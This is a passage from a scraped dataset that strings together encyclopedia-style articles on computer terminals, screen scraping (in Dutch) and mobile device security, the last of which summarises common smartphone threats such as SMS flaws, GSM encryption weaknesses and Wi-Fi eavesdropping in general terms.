the beginning of the decade and 19.6 kbps by the end of the decade, with higher speeds possible on more expensive terminals. The function of a terminal is typically confined to transcription and input of data; a device with significant local, programmable data-processing capability may be called a "smart terminal" or fat client. A terminal that depends on the host computer for its processing power is called a "dumb terminal" 5 or a thin client. 6 7 In the era of serial (RS 232) terminals there was a conflicting usage of the term "smart terminal" as a dumb terminal with no user-accessible local computing power but a particularly rich set of control codes for manipulating the display; this conflict was not resolved before hardware serial terminals became obsolete. A personal computer can run terminal emulator software that replicates functions of a real-world terminal, sometimes allowing concurrent use of local programs and access to a distant terminal host system, either over a direct serial connection or over a network using, e.g., SSH. Today few if any dedicated computer terminals are being manufactured, as time sharing on large computers has been replaced by personal computers, handheld devices and workstations with graphical user interfaces. User interactions with servers use either software such as Web browsers, or terminal emulators, with connections over high-speed networks. The console of Konrad Zuse's Z3 had a keyboard in 1941, as did the Z4 in 1942 1945. However, these consoles could only be used to enter numeric inputs and were thus analogous to those of calculating machines; programs, commands, and other data were entered via paper tape. Both machines had a row of display lamps for results. In 1956, the Whirlwind Mark I computer became the first computer equipped with a keyboard-printer combination with which to support direct input 4 of data and commands and output of results. That device was a Friden Flexowriter, which would continue to serve this purpose on many other early computers well into the 1960s. Early user terminals connected to computers were, like the Flexowriter, electromechanical teleprinters teletypewriters (TeleTYpewriter, TTY), such as the Teletype Model 33, originally used for telegraphy; early Teletypes were typically configured as Keyboard Send-Receive (KSR) or Automatic Send-Receive (ASR). Some terminals, such as the ASR Teletype models, included a paper tape reader and punch which could record output such as a program listing. The data on the tape could be re-entered into the computer using the tape reader on the teletype, or printed to paper. Teletypes used the current loop interface that was already used in telegraphy. A less expensive Read Only (RO) configuration was available for the Teletype. Custom-designs keyboard printer terminals that came later included the IBM 2741 (1965) 8 and the DECwriter (1970). 9 Respective top speeds of teletypes, IBM 2741 and the LA30 (an early DECwriter) were 10, 15 and 30 characters per second. Although at that time "paper was king" 9 10 the speed of interaction was relatively limited. The DECwriter was the last major printing-terminal product. It faded away after 1980 under pressure from video display units (VDUs), with the last revision (the DECwriter IV of 1982) abandoning the classic teletypewriter form for one more resembling a desktop printer. A video display unit (VDU) displays information on a screen rather than printing text to paper and typically uses a cathode-ray tube (CRT). VDUs in the 1950s were typically designed for displaying graphical data rather than text and were used in, e.g., experimental computers at institutions like MIT; computers used in academia, government and business, sold under brand names like DEC, ERA, IBM and UNIVAC; military computers supporting specific defence applications such as ballistic missile warning systems and radar air defence coordination systems like BUIC and SAGE. Two early landmarks in the development of the VDU were the Univac Uniscope 11 12 13 and the IBM 2260, 14 both in 1964. These were block-mode terminals designed to display a page at a time, using proprietary protocols; in contrast to character-mode devices, they enter data from the keyboard into a display buffer rather than transmitting them immediately. In contrast to later character-mode devices, the Uniscope used synchronous serial communication over an EIA RS 232 interface to communicate between the multiplexer and the host, while the 2260 used either a channel connection or asynchronous serial communication between the 2848 and the host. The 2265, related to the 2260, also used asynchronous serial communication. The Datapoint 3300 from Computer Terminal Corporation, announced in 1967 and shipped in 1969, was a character-mode device that emulated a Model 33 Teletype. This reflects the fact that early character-mode terminals were often deployed to replace teletype machines as a way to reduce operating costs. The next generation of VDUs went beyond teletype emulation with an addressable cursor that gave them the ability to paint two-dimensional displays on the screen. Very early VDUs with cursor addressibility included the VT05 and the Hazeltine 2000 operating in character mode, both from 1970. Despite this capability, early devices of this type were often called "Glass TTYs". 15 Later, the term "glass TTY" tended to be restrospectively narrowed to devices without full cursor addressibility. The classic era of the VDU began in the early 1970s and was closely intertwined with the rise of time sharing computers. Important early products were the ADM 3A, VT52, and VT100. These devices used no complicated CPU, instead relying on individual logic gates, LSI chips, or microprocessors such as the Intel 8080. This made them inexpensive and they quickly became extremely popular input-output devices on many types of computer system, often replacing earlier and more expensive printing terminals. After 1970 several suppliers gravitated to a set of common standards: The experimental era of serial VDUs culminated with the VT100 in 1978. By the early 1980s, there were dozens of manufacturers of terminals, including Lear-Siegler, ADDS, Data General, DEC, Hazeltine Corporation, Heath Zenith, Hewlett-Packard, IBM, TeleVideo, Volker-Craig, and Wyse, many of which had incompatible command sequences (although many used the early ADM 3 as a starting point). The great variations in the control codes between makers gave rise to software that identified and grouped terminal types so the system software would correctly display input forms using the appropriate control codes; In Unix-like systems the termcap or terminfo files, the stty utility, and the TERM environment variable would be used; in Data General's Business BASIC software, for example, at login-time a sequence of codes were sent to the terminal to try to read the cursor's position or the 25th line's contents using a sequence of different manufacturer's control code sequences, and the terminal-generated response would determine a single-digit number (such as 6 for Data General Dasher terminals, 4 for ADM 3A 5 11 12 terminals, 0 or 2 for TTYs with no special features) that would be available to programs to say which set of codes to use. The great majority of terminals were monochrome, manufacturers variously offering green, white or amber and sometimes blue screen phosphors. (Amber was claimed to reduce eye strain). Terminals with modest color capability were also available but not widely used; for example, a color version of the popular Wyse WY50, the WY350, offered 64 shades on each character cell. VDUs were eventually displaced from most applications by networked personal computers, at first slowly after 1985 and with increasing speed in the 1990s. However, they had a lasting influence on PCs. The keyboard layout of the VT220 terminal strongly influenced the Model M shipped on IBM PCs from 1985, and through it all later computer keyboards. Although flat-panel displays were available since the 1950s, cathode-ray tubes continued to dominate the market until the personal computer had made serious inroads into the display terminal market. By the time cathode-ray tubes on PCs were replaced by flatscreens after the year 2000, the hardware computer terminal was nearly obsolete. A character-oriented terminal is a type of computer terminal that communicates with its host one character at a time, as opposed to a block-oriented terminal that communicates in blocks of data. It is the most common type of data terminal, because it is easy to implement and program. Connection to the mainframe computer or terminal server is achieved via RS 232 serial links, Ethernet or other proprietary protocols. Character-oriented terminals can be "dumb" or "smart". Dumb terminals 5 are those that can interpret a limited number of control codes (CR, LF, etc.) but do not have the ability to process special escape sequences that perform functions such as clearing a line, clearing the screen, or controlling cursor position. In this context dumb terminals are sometimes dubbed glass Teletypes, for they essentially have the same limited functionality as does a mechanical Teletype. This type of dumb terminal is still supported on modern Unix-like systems by setting the environment variable TERM to dumb. Smart or intelligent terminals are those that also have the ability to process escape sequences, in particular the VT52, VT100 or ANSI escape sequences. A text terminal, or often just terminal (sometimes text console) is a serial computer interface for text entry and display. Information is presented as an array of pre-selected formed characters. When such devices use a video display such as a cathode-ray tube, they are called a "video display unit" or "visual display unit" (VDU) or "video display terminal" (VDT). The system console is often 16 a text terminal used to operate a computer. Modern computers have a built-in keyboard and display for the console. Some Unix-like operating systems such as Linux and FreeBSD have virtual consoles to provide several text terminals on a single computer. The fundamental type of application running on a text terminal is a command-line interpreter or shell, which prompts for commands from the user and executes each command after a press of Return. 17 This includes Unix shells and some interactive programming environments. In a shell, most of the commands are small applications themselves. Another important application type is that of the text editor. A text editor typically occupies the full area of display, displays one or more text documents, and allows the user to edit the documents. The text editor has, for many uses, been replaced by the word processor, which usually provides rich formatting features that the text editor lacks. The first word processors used text to communicate the structure of the document, but later word processors operate in a graphical environment and provide a WYSIWYG simulation of the formatted output. However, text editors are still used for documents containing markup such as DocBook or LaTeX. Programs such as Telix and Minicom control a modem and the local terminal to let the user interact with remote servers. On the Internet, telnet and ssh work similarly. In the simplest form, a text terminal is like a file. Writing to the file displays the text and reading from the file produces what the user enters. In Unix-like operating systems, there are several character special files that correspond to available text terminals. For other operations, there are special escape sequences, control characters and termios functions that a program can use, most easily via a library such as ncurses. For more complex operations, the programs can use terminal specific ioctl system calls. For an application, the simplest way to use a terminal is to simply write and read text strings to and from it sequentially. The output text is scrolled, so that only the last several lines (typically 24) are visible. Unix systems typically buffer the input text until the Enter key is pressed, so the application receives a ready string of text. In this mode, the application need not know much about the terminal. For many interactive applications this is not sufficient. One of the common enhancements is command-line editing (assisted with such libraries as readline); it also may give access to command history. This is very helpful for various interactive command-line interpreters. Even more advanced interactivity is provided with full-screen applications. Those applications completely control the screen layout; also they respond to key-pressing immediately. This mode is very useful for text editors, file managers and web browsers. In addition, such programs control the color and brightness of text on the screen, and decorate it with underline, blinking and special characters (e.g. box-drawing characters). To achieve all this, the application must deal not only with plain text strings, but also with control characters and escape sequences, which allow moving the cursor to an arbitrary position, clearing portions of the screen, changing colors and displaying special characters, and also responding to function keys. The great problem here is that there are many different terminals and terminal emulators, each with its own set of escape sequences. In order to overcome this, special libraries (such as curses) have been created, together with terminal description databases, such as Termcap and Terminfo. A block-oriented terminal or block mode terminal is a type of computer terminal that communicates with its host in blocks of data, as opposed to a character-oriented terminal that communicates with its host one character at a time. A block-oriented terminal may be card-oriented, display-oriented, keyboard-display, keyboard-printer, printer or some combination. The IBM 3270 is perhaps the most familiar implementation of a block-oriented display terminal, 18 but most mainframe computer manufacturers and several other companies produced them. The description below is in terms of the 3270, but similar considerations apply to other types. Block-oriented terminals typically incorporate a buffer which stores one screen or more of data, and also stores data attributes, not only indicating appearance (color, brightness, blinking, etc.) but also marking the data as being enterable by the terminal operator vs. protected against entry, as allowing the entry of only numeric information vs. allowing any characters, etc. In a typical application the host sends the terminal a preformatted panel containing both static data and fields into which data may be entered. The terminal operator keys data, such as updates in a database entry, into the appropriate fields. When entry is complete (or ENTER or PF key pressed on 3270s), a block of data, usually just the data entered by the operator (modified data), is sent to the host in one transmission. The 3270 terminal buffer (at the device) could be updated on a single character basis, if necessary, because of the existence of a "set buffer address order" (SBA), that usually preceded any data to be written overwritten within the buffer. A complete buffer could also be read or replaced using the READ BUFFER command or WRITE command (unformatted or formatted in the case of the 3270). Block-oriented terminals cause less system load on the host and less network traffic than character-oriented terminals. They also appear more responsive to the user, especially over slow connections, since editing within a field is done locally rather than depending on echoing from the host system. Early terminals had limited editing capabilities 3270 terminals, for example, only could check entries as valid numerics. 19 Subsequent "smart" or "intelligent" terminals incorporated microprocessors and supported more local processing. Programmers of block-oriented terminals often used the technique of storing context information for the transaction in progress on the screen, possibly in a hidden field, rather than depending on a running program to keep track of status. This was the precursor of the HTML technique of storing context in the URL as data to be passed as arguments to a CGI program. Unlike a character-oriented terminal, where typing a character into the last position of the screen usually causes the terminal to scroll down one line, entering data into the last screen position on a block-oriented terminal usually causes the cursor to wrap— move to the start of the first enterable field. Programmers might "protect" the last screen position to prevent inadvertent wrap. Likewise a protected field following an enterable field might lock the keyboard and sound an audible alarm if the operator attempted to enter more data into the field than allowed. A graphical terminal can display images as well as text. Graphical terminals 23 are divided into vector-mode terminals, and raster mode. A vector-mode display directly draws lines on the face of a cathode-ray tube under control of the host computer system. The lines are continuously formed, but since the speed of electronics is limited, the number of concurrent lines that can be displayed at one time is limited. Vector-mode displays were historically important but are no longer used. Practically all modern graphic displays are raster-mode, descended from the picture scanning techniques used for television, in which the visual elements are a rectangular array of pixels. Since the raster image is only perceptible to the human eye as a whole for a very short time, the raster must be refreshed many times per second to give the appearance of a persistent display. The electronic demands of refreshing display memory meant that graphic terminals were developed much later than text terminals, and initially cost much more. 24 25 Most terminals today when? are graphical; that is, they can show images on the screen. The modern term for graphical terminal is "thin client". citation needed A thin client typically uses a protocol like X11 for Unix terminals, or RDP for Microsoft Windows. The bandwidth needed depends on the protocol used, the resolution, and the color depth. Modern graphic terminals allow display of images in color, and of text in varying sizes, colors, and fonts (type faces). clarification needed In the early 1990s, an industry consortium attempted to define a standard, AlphaWindows, that would allow a single CRT screen to implement multiple windows, each of which was to behave as a distinct terminal. Unfortunately, like I2O, this suffered from being run as a closed standard: non-members were unable to obtain even minimal information and there was no realistic way a small company or independent developer could join the consortium. citation needed An intelligent terminal 26 does its own processing, usually implying a microprocessor is built in, but not all terminals with microprocessors did any real processing of input: the main computer to which it was attached would have to respond quickly to each keystroke. The term "intelligent" in this context dates from 1969. 27 Notable examples include the IBM 2250, predecessor to the IBM 3250 and IBM 5080, and IBM 2260, 28 predecessor to the IBM 3270, introduced with System 360 in 1964. Most terminals were connected to minicomputers or mainframe computers and often had a green or amber screen. Typically terminals communicate with the computer via a serial port via a null modem cable, often using an EIA RS 232 or RS 422 or RS 423 or a current loop serial interface. IBM systems typically communicated over a Bus and Tag channel, a coaxial cable using a proprietary protocol, a communications link using Binary Synchronous Communications or IBM's SNA protocol, but for many DEC, Data General and NCR (and so on) computers there were many visual display suppliers competing against the computer manufacturer for terminals to expand the systems. In fact, the instruction design for the Intel 8008 was originally conceived at Computer Terminal Corporation as the processor for the Datapoint 2200. From the introduction of the IBM 3270, and the DEC VT100 (1978), the user and programmer could notice significant advantages in VDU technology improvements, yet not all programmers used the features of the new terminals (backward compatibility in the VT100 and later TeleVideo terminals, for example, with "dumb terminals" allowed programmers to continue to use older software). Some dumb terminals had been able to respond to a few escape sequences without needing microprocessors: they used multiple printed circuit boards with many integrated circuits; the single factor that classed a terminal as "intelligent" was its ability to process user-input within the terminal—not interrupting the main computer at each keystroke—and send a block of data at a time (for example: when the user has finished a whole field or form). Most terminals in the early 1980s, such as ADM 3A, TVI912, Data General D2, DEC VT52, despite the introduction of ANSI terminals in 1978, were essentially "dumb" terminals, although some of them (such as the later ADM and TVI models) did have a primitive block-send capability. Common early uses of local processing power included features that had little to do with off-loading data processing from the host computer but added useful features such as printing to a local printer, buffered serial data transmission and serial handshaking (to accommodate higher serial transfer speeds), and more sophisticated character attributes for the display, as well as the ability to switch emulation modes to mimic competitor's models, that became increasingly important selling features during the 1980s especially, when buyers could mix and match different suppliers' equipment to a greater extent than before. The advance in microprocessors and lower memory costs made it possible for the terminal to handle editing operations such as inserting characters within a field that may have previously required a full screen-full of characters to be re-sent from the computer, possibly over a slow modem line. Around the mid 1980s most intelligent terminals, costing less than most dumb terminals would have a few years earlier, could provide enough user-friendly local editing of data and send the completed form to the main computer. Providing even more processing possibilities, workstations like the TeleVideo TS 800 could run CP M 86, blurring the distinction between terminal and Personal Computer. Another of the motivations for development of the microprocessor was to simplify and reduce the electronics required in a terminal. That also made it practicable to load several "personalities" into a single terminal, so a Qume QVT 102 could emulate many popular terminals of the day, and so be sold into organizations that did not wish to make any software changes. Frequently emulated terminal types included: The ANSI X3.64 escape code standard produced uniformity to some extent, but significant differences remained. For example, the VT100, Heathkit H19 in ANSI mode, Televideo 970, Data General D460, and Qume QVT 108 terminals all followed the ANSI standard, yet differences might exist in codes from function keys, what character attributes were available, block-sending of fields within forms, "foreign" character facilities, and handling of printers connected to the back of the screen. In the 21st century, the term Intelligent Terminal can now refer to a retail Point of Sale computer. 29 While early IBM PCs had single-color green screens, these screens were not terminals. The screen of a PC did not contain any character generation hardware; all video signals and video formatting were generated by the video display card in the PC, or (in most graphics modes) by the CPU and software. An IBM PC monitor, whether it was the green monochrome display or the 16 color display, was technically much more similar to an analog TV set (without a tuner) than to a terminal. With suitable software a PC could, however, emulate a terminal, and in that capacity it could be connected to a mainframe or minicomputer. The Data General One could be booted into terminal emulator mode from its ROM. Eventually microprocessor-based personal computers greatly reduced the market demand for conventional terminals. In the 1990s especially, "thin clients" and X terminals have combined economical local processing power with central, shared computer facilities to retain some of the advantages of terminals over personal computers: Today, most PC telnet clients provide emulation of the most common terminal, citation needed the DEC VT100, using the ANSI escape code standard X3.64, or could run as X terminals using software such as Cygwin X under Microsoft Windows or X.Org Server software under Linux. Since the advent and subsequent popularization of the personal computer, few genuine hardware terminals are used to interface with computers today. Using the monitor and keyboard, modern operating systems like Linux and the BSD derivatives feature virtual consoles, which are mostly independent from the hardware used. When using a graphical user interface (or GUI) like the X Window System, one's display is typically occupied by a collection of windows associated with various applications, rather than a single stream of text associated with a single process. In this case, one may use a terminal emulator application within the windowing environment. This arrangement permits terminal-like interaction with the computer (for running a command-line interpreter, for example) without the need for a physical terminal device; it can even run multiple terminal emulators on the same device. Several categories of terminals described above have been used as hardware and software consoles, with some variation in the nomenclature. These may be keyboard printer terminals, keyboard display terminals, or special applications running on a smaller computer. They frequently attach via a proprietary interface, and supplement or replace the functions of a front panel. They are sometimes referred to as control consoles or system consoles. These may be keyboard printer terminals, keyboard display terminals or applications. On some systems, e.g., OS 360, they have a specialized role with its own command language, unrelated to the command language for user sessions on normal terminals. On, e.g., Unix-like systems, the software is controlled by users with elevated privileges and a system console is just an ordinary terminal with a privileged user logged on. It is common for, e.g., Unix-like systems, to include applications with names like command, console, terminal, to serve as consoles for the logged on user. One meaning of system console, computer console, root console, operator's console, or simply console is the text entry and display device for system administration messages, particularly those from the BIOS or boot loader, the kernel, from the init system and from the system logger. It is a physical device consisting of a keyboard and a printer or screen, and traditionally is a text terminal, but may also be a graphical terminal. System consoles are generalized to computer terminals, which are abstracted respectively by virtual consoles and terminal emulators. Today communication with system consoles is generally done abstractly, via the standard streams (stdin, stdout, and stderr), but there may be system-specific interfaces, for example those used by the system kernel. 30 better source needed Another, older, meaning of system console, computer console, hardware console, operator's console or simply console is a hardware component used by an operator to control the hardware, typically some combination of front panel, keyboard printer and keyboard display. Prior to the development of alphanumeric CRT system consoles, some computers such as the IBM 1620 had console typewriters and front panels while the very first electronic stored-program computer, the Manchester Baby, used a combination of electromechanical switches and a CRT to provide console functions—the CRT displaying memory contents in binary by mirroring the machine's Williams-Kilburn tube CRT-based RAM. Some early operating systems supported either a single keyboard print or keyboard display device for controlling the OS. Some also supported a single alternate console, and some supported a hardcopy console for retaining a record of commands, responses and other console messages. However, in the late 1960s it became common for operating systems to support many more consoles than 3, and operating systems began appearing in which the console was simply any terminal with a privileged user logged on. On early minicomputers, the console was a serial console, an RS 232 serial link to a terminal such as a ASR 33 or, later, a terminal from Digital Equipment Corporation (DEC), e.g., DECWriter, VT100. This terminal was usually kept in a secured room since it could be used for certain privileged functions such as halting the system or selecting which media to boot from. Large midrange systems, e.g. those from Sun Microsystems, Hewlett-Packard and IBM, citation needed still use serial consoles. In larger installations, the console ports are attached to multiplexers or network-connected multiport serial servers that let an operator connect a terminal to any of the attached servers. Today, serial consoles are often used for accessing headless systems, usually with a terminal emulator running on a laptop. Also, routers, enterprise network switches and other telecommunication equipment have RS 232 serial console ports. On PCs and workstations, the computer's attached keyboard and monitor have the equivalent function. Since the monitor cable carries video signals, it cannot be extended very far. Often, installations with many servers therefore use keyboard video multiplexers (KVM switches) and possibly video amplifiers to centralize console access. In recent years, KVM IP devices have become available that allow a remote computer to view the video output and send keyboard input via any TCP IP network and therefore the Internet. Some PC BIOSes, especially in servers, also support serial consoles, giving access to the BIOS through a serial port so that the simpler and cheaper serial console infrastructure can be used. Even where BIOS support is lacking, some operating systems, e.g. FreeBSD and Linux, can be configured for serial console operation either during bootup, or after startup. Starting with the IBM 9672, IBM large systems have used a Hardware Management Console (HMC), consisting of a PC and a specialized application, instead of a 3270 or serial link. Other IBM product lines also use an HMC, e.g., System p. It is usually possible to log in from the console. Depending on configuration, the operating system may treat a login session from the console as being more trustworthy than a login session from other sources. A terminal emulator is a piece of software that emulates a text terminal. In the past, before the widespread use of local area networks and broadband internet access, many computers would use a serial access program to communicate with other computers via telephone line or serial device. When the first Macintosh was released, a program called MacTerminal 31 was used to communicate with many computers, including the IBM PC. The Win32 console on Windows does not emulate a physical terminal that supports escape sequences 32 dubious discuss so SSH and Telnet programs (for logging in textually to remote computers) for Windows, including the Telnet program bundled with some versions of Windows, often incorporate their own code to process escape sequences. The terminal emulators on most Unix-like systems—such as, for example, gnome-terminal, Konsole, QTerminal, xterm, and Terminal.app—do emulate physical terminals including support for escape sequences; e.g., xterm can emulate the VT220 and Tektronix 4010 hardware terminals. Terminals can operate in various modes, relating to when they send input typed by the user on the keyboard to the receiving system (whatever that may be): There is a distinction between the return and the Enter keys. In some multiple-mode terminals, that can switch between modes, pressing the Enter key when not in block mode does not do the same thing as pressing the return key. Whilst the return key will cause an input line to be sent to the host in line-at-a-time mode, the Enter key will rather cause the terminal to transmit the contents of the character row where the cursor is currently positioned to the host, host-issued prompts and all. 35 Some block-mode terminals have both an Enter and local cursor moving keys such as Return and New Line. Different computer operating systems require different degrees of mode support when terminals are used as computer terminals. The POSIX terminal interface, as provided by Unix and POSIX-compliant operating systems, does not accommodate block-mode terminals at all, and only rarely requires the terminal itself to be in line-at-a-time mode, since the operating system is required to provide canonical input mode, where the terminal device driver in the operating system emulates local echo in the terminal, and performs line editing functions at the host end. Most usually, and especially so that the host system can support non-canonical input mode, terminals for POSIX-compliant systems are always in character-at-a-time mode. In contrast, IBM 3270 terminals connected to MVS systems are always required to be in block mode. 37 38 39 40 |
564 | https://en.wikipedia.org/wiki/Data_scraping | https://nl.wikipedia.org/wiki/Screen_scraping | Screen scraping is een computertechniek waarbij de gegevens vanaf een computerbeeldscherm worden uitgelezen en gebruikt voor invoer in een ander, achterliggend programma. Deze techniek wordt toegepast om de computeruitvoer van het ene programma geautomatiseerd over te nemen in een ander programma. Screen scraping wordt vooral toegepast voor het overzetten van gegevens uit programma's waarvoor de geautomatiseerde geprogrammeerde conversie niet mogelijk is. Het betreft dan programma's die de uitvoer genereren op een beeldscherm. Te denken valt aan het overzetten van gegevens uit een mainframe- of terminal-scherm naar een tekstverwerker of een ander transactiesysteem. Dergelijke 'legacy' systemen zijn veelal niet geschikt voor het in digitale vorm overzetten van gegevens, waardoor screen scraping, zonder aanpassing van de oude programmatuur, een effici nte techniek is. Screen scraping wordt toegepast door het uitlezen van het videogeheugen van een terminal emulator. De opbouw van een terminal scherm is betrekkelijk eenvoudig, namelijk 25 regels tekst van 80 posities. Ook de velden op deze schermen zijn eenduidig gedefinieerd, waardoor automatisch een vorm van een protocol werd toegepast. Bijvoorbeeld: het veld op positie 60 van regel 15 is 8 tekens lang. Het screen scraping-programma wordt dan zodanig geconfigureerd dan dit betreffende veld kan worden uitgelezen en gekopieerd naar een geheugenbuffer, waarvandaan het vervolgens als invoer in een ander programma op een bepaalde invoerpositie kan worden gebruikt. |
565 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Mobile_security | Mobile security, or mobile device security, is the protection of smartphones, tablets, and laptops from threats associated with wireless computing. 1 It has become increasingly important in mobile computing. The security of personal and business information now stored on smartphones is of particular concern. 2 Increasingly, users and businesses use smartphones not only to communicate, but also to plan and organize their work and private life. Within companies, these technologies are causing profound changes in the organization of information systems and have therefore become the source of new risks. Indeed, smartphones collect and compile an increasing amount of sensitive information to which access must be controlled to protect the privacy of the user and the intellectual property of the company. The majority of attacks are aimed at smartphones. citation needed These attacks take advantage of vulnerabilities discovered in smartphones that can result from different modes of communication, including Short Message Service (SMS, text messaging), Multimedia Messaging Service (MMS), wireless connections, Bluetooth, and GSM, the de facto international standard for mobile communications. Smartphone operating systems or browsers are another weakness. Some malware makes use of the common user's limited knowledge. Only 2.1% of users reported having first-hand contact with mobile malware, according to a 2008 McAfee study, which found that 11.6% of users had heard of someone else being harmed by the problem. Yet, it is predicted that this number will rise. 3 Security countermeasures are being developed and applied to smartphones, from security best practices in software to the dissemination of information to end users. Countermeasures can be implemented at all levels, including operating system development, software design, and user behavior modifications. A smartphone user is exposed to various threats when they use their phone. In just the last two quarters of 2012, the number of unique mobile threats grew by 261%, according to ABI Research. 3 These threats can disrupt the operation of the smartphone and transmit or modify user data. Applications must guarantee privacy and integrity of the information they handle. In addition, since some apps could themselves be malware, their functionality and activities should be limited (for example, restricting the apps from accessing location information via the Global Positioning System (GPS), blocking access to the user's address book, preventing the transmission of data on the network, or sending SMS messages that are billed to the user). 1 Malicious apps can also be installed without the owners' permission or knowledge. Vulnerability in mobile devices refers to aspects of system security that are susceptible to attacks. A vulnerability occurs when there is system weakness, an attacker has access to the weakness, and the attacker has competency to exploit the weakness. 1 Potential attackers began looking for vulnerabilities when Apple's iPhone and the first Android devices came onto the market. Since the introduction of apps (particularly mobile banking apps), which are vital targets for hackers, malware has been rampant. The Department of Homeland Security's cybersecurity department claims that the number of vulnerable points in smartphone operating systems has increased. when? As mobile phones are connected to utilities and appliances, hackers, cybercriminals, and even intelligence officials have access to these devices. 4 Starting in 2011, it became increasingly popular to let employees use their own devices for work-related purposes. The Crowd Research Partners study, published in 2017, reports that during 2017, most businesses that mandated the use of mobile devices were subjected to malware attacks and breaches. It has become common for rogue applications to be installed on user devices without the user's permission. They breach privacy, which hinders the effectiveness of the devices. citation needed clarification needed Since the recent rise of mobile attacks, hackers have increasingly targeted smartphones through credential theft and snooping. The number of attacks targeting smartphones and other devices has risen by 50 percent. citation needed According to the study, which? mobile banking applications are responsible for the increase in attacks. Malware—such as ransomware, worms, botnets, Trojans, and viruses—have been developed to exploit vulnerabilities in mobile devices. Malware is distributed by attackers so they can gain access to private information or digitally harm a user. For example, should malware breach a user's banking service, it may be able to access their transaction information, their rights to log in, and their money. Some malware is developed with anti-detection techniques to avoid detection. Attackers who use malware can avoid detection by hiding malicious code. Trojan-droppers can also avoid detection of malware. Despite the fact that the malware inside a device does not change, the dropper generates new hashes each time. Additionally, droppers can also create a multitude of files, which can lead to the creation of viruses. Android mobile devices are prone to Trojan-droppers. The banking Trojans also enable attacks on the banking applications on the phone, which leads to the theft of data for use in stealing money and funds. clarification needed Jailbreaks for iOS devices work by disabling the signing of codes on iPhones so that applications not downloaded from the App Store can be operated. In this way, all the protection layers offered by iOS are disrupted, exposing the device to malware. These outside applications don't run in a sandbox, which exposes potential security problems. Some attack vectors change the mobile devices' configuration settings by installing malicious credentials and virtual private networks (VPNs) to direct information to malicious systems. In addition, spyware can be installed on mobile devices in order to track an individual. Triade malware comes pre-installed on some mobile devices. In addition to Haddad, there is Lotoor, which exploits vulnerabilities in the system to repackage legitimate applications. 5 The devices are also vulnerable due to spyware and leaky behaviors through applications. Mobile devices are also effective conveyance systems for malware threats, breaches of information, and thefts. Wi-Fi interference technologies can also attack mobile devices through potentially insecure networks. By compromising the network, hackers are able to gain access to key data. Devices connected to public networks are at risk of attacks. A VPN, on the other hand, can be used to secure networks. As soon as a system is threatened, an active VPN will operate. There are also social engineering techniques, such as phishing, in which unsuspecting victims are sent links to lead them to malicious websites. The attackers can then hack into the victim's device and copy all of its information. Some mobile device attacks can be prevented. For example, containerization allows the creation of a hardware infrastructure that separates business data from other data. Additionally, network protection detects malicious traffic and rogue access points. Data security is also ensured through authentication. 1 There are a number of threats to mobile devices, including annoyance, stealing money, invading privacy, propagation, and malicious tools. 6 There are three prime targets for attackers: 7 Attacks on mobile security systems include: The source of these attacks are the same actors found in the non-mobile computing space: 7 When a smartphone is infected by an attacker, the attacker can attempt several things: Some attacks derive from flaws in the management of Short Message Service (SMS) and Multimedia Messaging Service (MMS). Some mobile phone models have problems in managing binary SMS messages. By sending an ill-formed block, it is possible to cause the phone to restart, leading to the denial-of-service attacks. If a user with a Siemens S55 received a text message containing a Chinese character, it would lead to a denial of service. 17 In another case, while the standard requires that the maximum size of a Nokia Mail address is 32 characters, some Nokia phones did not verify this standard, so if a user enters an email address over 32 characters, that leads to complete dysfunction of the e-mail handler and puts it out of commission. This attack is called "curse of silence". A study on the safety of the SMS infrastructure revealed that SMS messages sent from the Internet can be used to perform a distributed denial of service (DDoS) attack against the mobile telecommunications infrastructure of a big city. The attack exploits the delays in the delivery of messages to overload the network. Another potential attack could begin with a phone that sends an MMS to other phones, with an attachment. This attachment is infected with a virus. Upon receipt of the MMS, the user can choose to open the attachment. If it is opened, the phone is infected, and the virus sends an MMS with an infected attachment to all the contacts in the address book. There is a real-world example of this attack: the virus Commwarrior 16 sends MMS messages (including an infected file) to all recipients in a mobile phone's address book. If a recipient installs the infected file, the virus repeats, sending messages to recipients taken from the new address book. The attacker may try to break the encryption of a GSM mobile network. The network encryption algorithms belong to the family of algorithms called A5. Due to the policy of security through obscurity, it has not been possible to openly test the robustness of these algorithms. There were originally two variants of the algorithm: A5 1 and A5 2 (stream ciphers), where the former was designed to be relatively strong, and the latter was purposely designed to be weak to allow easy cryptanalysis and eavesdropping. ETSI forced some countries (typically outside Europe) to use A5 2. Since the encryption algorithm was made public, it was proved to be breakable: A5 2 could be broken on the fly, and A5 1 in about 6 hours. 18 In July 2007, the 3GPP approved a change request to prohibit the implementation of A5 2 in any new mobile phones, decommissioning the algorithm; it is no longer implemented in mobile phones. Stronger public algorithms have been added to the GSM standard: the A5 3 and A5 4 (Block ciphers), otherwise known as KASUMI or UEA1 19 published by ETSI. If the network does not support A5 1, or any other A5 algorithm implemented by the phone, then the base station can specify A5 0 which is the null algorithm, whereby the radio traffic is sent unencrypted. Even if mobile phones are able to use 3G or 4G (which have much stronger encryption than 2G GSM), the base station can downgrade the radio communication to 2G GSM and specify A5 0 (no encryption). 20 This is the basis for eavesdropping attacks on mobile radio networks using a fake base station commonly called an IMSI catcher. In addition, tracing of mobile terminals is difficult since each time the mobile terminal is accessing or being accessed by the network, a new temporary identity (TMSI) is allocated to the mobile terminal. The TMSI is used as the identity of the mobile terminal the next time it accesses the network. The TMSI is sent to the mobile terminal in encrypted messages. citation needed Once the encryption algorithm of GSM is broken, the attacker can intercept all unencrypted communications made by the victim's smartphone. An attacker can try to eavesdrop on Wi-Fi communications to derive information (e.g., username, password). This type of attack is not unique to smartphones, but they are very vulnerable to these attacks because often Wi-Fi is their only means of communication and access the internet. The security of wireless networks (WLAN) is thus an important subject. Initially, wireless networks were secured by WEP keys. The weakness of WEP is its short encryption key, which is the same for all connected clients. In addition, several reductions in the search space of the keys have been found by researchers. Now, most wireless networks are protected by the WPA security protocol. WPA is based on the Temporal Key Integrity Protocol (TKIP), which was designed to allow migration from WEP to WPA on the equipment already deployed. The major improvements in security are the dynamic encryption keys. For small networks, the WPA uses a "pre-shared key" which is based on a shared key. Encryption can be vulnerable if the length of the shared key is short. With limited opportunities for input (i.e., only the numeric keypad), mobile phone users might define short encryption keys that contain only numbers. This increases the likelihood that an attacker succeeds with a brute-force attack. The successor to WPA, called WPA2, is supposed to be safe enough to withstand a brute force attack. The ability to access free and fast Wi-Fi gives a business an edge over those who do not. Free Wi-Fi is usually provided by organizations such as airports, coffee shops, and restaurants for a number of reasons, including encouraging customers to spend more time and money on the premises, and helping users stay productive. 1 Another reason is enhancing customer tracking: many restaurants and coffee shops compile data about their customers so they can target advertisements directly to their devices. citation needed This means that 